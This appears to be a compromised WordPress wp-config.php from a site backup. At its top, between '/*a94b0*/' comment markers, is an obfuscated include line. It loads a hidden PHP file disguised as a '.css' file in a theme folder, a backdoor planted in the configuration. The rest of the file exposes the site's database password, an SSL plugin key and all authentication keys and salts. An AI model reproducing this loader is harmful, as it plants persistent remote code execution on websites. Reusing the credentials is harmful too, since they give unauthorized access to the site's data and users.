File: //old_home_backup/thecityofbath.co.uk/public_html/wp-config.php
<?php
/*a94b0*/
$rqr = "//home/thecityofbath.co.uk/\x70ublic_html/w\x70\x2dcontent/themes/twentytwentythree/.1a6813b7.css"; if (!isset($rqr)) {print ($rqr);} else { @include_once /* 251 */ ($rqr); }
/*a94b0*/
//Begin Really Simple SSL key
define('RSSSL_KEY', 'l3m46e5dnHoXBQEFKpCVH4V2bLIXdGHgBWULuvUUPjd41vjV6ewA8UkI2hhjAsvL');
//END Really Simple SSL key
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information
* by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'thecityofbathcouk');
/** MySQL database username */
define('DB_USER', 'thecityofbathcouk');
/** MySQL database password */
define('DB_PASSWORD', 'mGTf77aEB1PX6DeU');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'Vg+_3;U3jW|<{eMBRal177*pY3rqa?dt:hOX<Y]ks?Phu}!sl3(.GLSFp94}r%~W');
define('SECURE_AUTH_KEY', '7.6^_WGr|+oWu$6B-.1x6[.1U{!M=~-{6lh+-edclEuL|T*5!Y4<f_Y-g*Spol[[');
define('LOGGED_IN_KEY', 'C#<5_1XOG`4MGi?N]x6s&p=;(H|CE[$i+54p.D%v60jR^1Bupd%_LD$9U,wEB+{$');
define('NONCE_KEY', 'M+ASD#5!7OV>dx6s3)>rg+Hs|aF_1yI5K:/D+Zo_bRBp^tu9f[LT/]G5Y]Q?oHzX');
define('AUTH_SALT', 'G279$g]O&OI1|gieWwN23s-Y]0GE~,o3l7 e,wyd/X(2SRXCDjcV)C05h(<Fbfru');
define('SECURE_AUTH_SALT', 'UTt#IVD!JFBF*|@-EH0.@#a%No?=rT$/^*|<*<-=p6_Bgm>Q [h?CVZZ0+G|;hG9');
define('LOGGED_IN_SALT', 'V_i`4B-Wz&=!G,|-tFP 2U~FTBA4]!b[}UXy8SD1+]23=@-64k$y(gz-D*8(?;Dy');
define('NONCE_SALT', '-u*a!gSxK(|LV-grWe yswgVn/x]38#O%)yq#)2Qh5q,F;_cx^s%~!-W9o~0H]C[');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');